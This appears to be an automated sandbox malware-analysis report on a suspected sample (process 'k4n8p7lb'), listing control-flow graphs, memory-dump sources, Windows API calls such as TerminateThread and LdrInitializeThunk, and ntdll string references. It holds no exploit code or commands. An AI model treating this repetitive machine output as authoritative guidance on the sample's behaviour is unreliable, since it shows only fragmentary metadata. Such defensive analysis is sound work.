                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 206 1e8f2c30-1e8f2c3c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 207 1e8f2c50-1e8f2c5c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 204 1e8f2b90-1e8f2b9c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 205 1e8f2bc0-1e8f2bcc LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 203 1e8f2b10-1e8f2b1c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 202 1e8f29f0-1e8f29fc LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 0 57395e-5739a0 2 5739a1-5739a7 0->2 3 5739db-573ad5 TerminateThread 0->3 4 573945-573959 2->4 5 5739a9-5739d5 2->5 9 573c8d-573ca8 3->9 10 573adb-573aea 3->10 4->2 5->3 10->9 11 573af0-573af4 10->11 11->9 12 573afa-573afe 11->12 12->9 13 573b04-573b08 12->13 13->9 14 573b0e-573b12 13->14 14->9 15 573b18-573b1c 14->15 15->9 16 573b22-573b73 15->16 16->9 18 573b79-573b99 16->18 19 573b9a-573bee 18->19 21 573bf0-573bf9 19->21 22 573c0a-573c88 19->22 21->9 23 573bff-573c00 21->23 23->19
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29453095155.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 25 573987-57398e 26 573990-5739a0 25->26 27 57395b 25->27 28 5739a1-5739a7 26->28 29 5739db-573ad5 TerminateThread 26->29 30 5739a6-5739ae 27->30 31 57395d-57395f 27->31 34 573945-573959 28->34 35 5739a9-5739d5 28->35 39 573c8d-573ca8 29->39 40 573adb-573aea 29->40 32 5739b0-5739d5 30->32 33 573939-573942 30->33 31->25 32->29 33->34 34->28 35->29 40->39 41 573af0-573af4 40->41 41->39 42 573afa-573afe 41->42 42->39 43 573b04-573b08 42->43 43->39 44 573b0e-573b12 43->44 44->39 45 573b18-573b1c 44->45 45->39 46 573b22-573b73 45->46 46->39 48 573b79-573b99 46->48 49 573b9a-573bee 48->49 51 573bf0-573bf9 49->51 52 573c0a-573c88 49->52 51->39 53 573bff-573c00 51->53 53->49
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29453095155.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 55 573a0a-573ad5 TerminateThread 60 573c8d-573ca8 55->60 61 573adb-573aea 55->61 61->60 62 573af0-573af4 61->62 62->60 63 573afa-573afe 62->63 63->60 64 573b04-573b08 63->64 64->60 65 573b0e-573b12 64->65 65->60 66 573b18-573b1c 65->66 66->60 67 573b22-573b73 66->67 67->60 69 573b79-573b99 67->69 70 573b9a-573bee 69->70 72 573bf0-573bf9 70->72 73 573c0a-573c88 70->73 72->60 74 573bff-573c00 72->74 74->70
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29453095155.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 100 57393c-573942 101 573945-5739a7 100->101 103 5739a9-573ad5 TerminateThread 101->103 108 573c8d-573ca8 103->108 109 573adb-573aea 103->109 109->108 110 573af0-573af4 109->110 110->108 111 573afa-573afe 110->111 111->108 112 573b04-573b08 111->112 112->108 113 573b0e-573b12 112->113 113->108 114 573b18-573b1c 113->114 114->108 115 573b22-573b73 114->115 115->108 117 573b79-573b99 115->117 118 573b9a-573bee 117->118 120 573bf0-573bf9 118->120 121 573c0a-573c88 118->121 120->108 122 573bff-573c00 120->122 122->118
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29453095155.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 76 5738e3-573942 77 573945-5739a7 76->77 79 5739a9-573ad5 TerminateThread 77->79 84 573c8d-573ca8 79->84 85 573adb-573aea 79->85 85->84 86 573af0-573af4 85->86 86->84 87 573afa-573afe 86->87 87->84 88 573b04-573b08 87->88 88->84 89 573b0e-573b12 88->89 89->84 90 573b18-573b1c 89->90 90->84 91 573b22-573b73 90->91 91->84 93 573b79-573b99 91->93 94 573b9a-573bee 93->94 96 573bf0-573bf9 94->96 97 573c0a-573c88 94->97 96->84 98 573bff-573c00 96->98 98->94
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29453095155.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 124 573a80-573ac2 126 573a45-573a7b TerminateThread 124->126 127 573ac3-573ad5 124->127 126->127 129 573c8d-573ca8 127->129 130 573adb-573aea 127->130 130->129 131 573af0-573af4 130->131 131->129 133 573afa-573afe 131->133 133->129 134 573b04-573b08 133->134 134->129 135 573b0e-573b12 134->135 135->129 136 573b18-573b1c 135->136 136->129 137 573b22-573b73 136->137 137->129 139 573b79-573b99 137->139 140 573b9a-573bee 139->140 142 573bf0-573bf9 140->142 143 573c0a-573c88 140->143 142->129 144 573bff-573c00 142->144 144->140
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29453095155.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 146 573962-573967 147 57396c-57397d 146->147 148 573969-57396b 146->148 147->146 150 57397f-573982 147->150 148->147 149 573938-573942 148->149 153 573945-573959 149->153 152 5739a1-5739a7 150->152 152->153 154 5739a9-573ad5 TerminateThread 152->154 153->152 159 573c8d-573ca8 154->159 160 573adb-573aea 154->160 160->159 161 573af0-573af4 160->161 161->159 162 573afa-573afe 161->162 162->159 163 573b04-573b08 162->163 163->159 164 573b0e-573b12 163->164 164->159 165 573b18-573b1c 164->165 165->159 166 573b22-573b73 165->166 166->159 168 573b79-573b99 166->168 169 573b9a-573bee 168->169 171 573bf0-573bf9 169->171 172 573c0a-573c88 169->172 171->159 173 573bff-573c00 171->173 173->169
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29453095155.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 175 573a84-573a89 176 573a8e-573a9f 175->176 177 573a8b-573a8d 175->177 176->175 179 573aa1-573aa4 176->179 177->176 178 573a5a-573a6a TerminateThread 177->178 180 573a71-573a7b 178->180 181 573ac3-573ad5 179->181 180->181 182 573c8d-573ca8 181->182 183 573adb-573aea 181->183 183->182 184 573af0-573af4 183->184 184->182 185 573afa-573afe 184->185 185->182 186 573b04-573b08 185->186 186->182 187 573b0e-573b12 186->187 187->182 188 573b18-573b1c 187->188 188->182 189 573b22-573b73 188->189 189->182 191 573b79-573b99 189->191 192 573b9a-573bee 191->192 194 573bf0-573bf9 192->194 195 573c0a-573c88 192->195 194->182 196 573bff-573c00 194->196 196->192
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29453095155.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 198 1e8f2b2a-1e8f2b2f 199 1e8f2b3f-1e8f2b46 LdrInitializeThunk 198->199 200 1e8f2b31-1e8f2b38 198->200
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                      • API String ID: 3446177414-1700792311
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                      • API String ID: 0-4253913091
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 1E8CD2C4
                                                                                                                                                        • Part of subcall function 1E938514: RtlDebugPrintTimes.NTDLL ref: 1E938579
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: (,p$x-p
                                                                                                                                                      • API String ID: 3446177414-3978274645
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: HEAP:
                                                                                                                                                      • API String ID: 3446177414-2466845122
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1E924530
                                                                                                                                                      • Execute=1, xrefs: 1E92451E
                                                                                                                                                      • ExecuteOptions, xrefs: 1E9244AB
                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1E924460
                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 1E924592
                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1E92454D
                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1E924507
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      • Actx , xrefs: 1E917819, 1E917880
                                                                                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E917807
                                                                                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 1E9177DD, 1E917802
                                                                                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E9177E2
                                                                                                                                                      • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1E9178F3
                                                                                                                                                      • SsHd, xrefs: 1E8CA304
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                      • API String ID: 0-1988757188
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • Actx , xrefs: 1E919315
                                                                                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E919178
                                                                                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 1E91914E, 1E919173
                                                                                                                                                      • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1E919372
                                                                                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E919153
                                                                                                                                                      • GsHd, xrefs: 1E8CD794
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                      • API String ID: 3446177414-2196497285
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
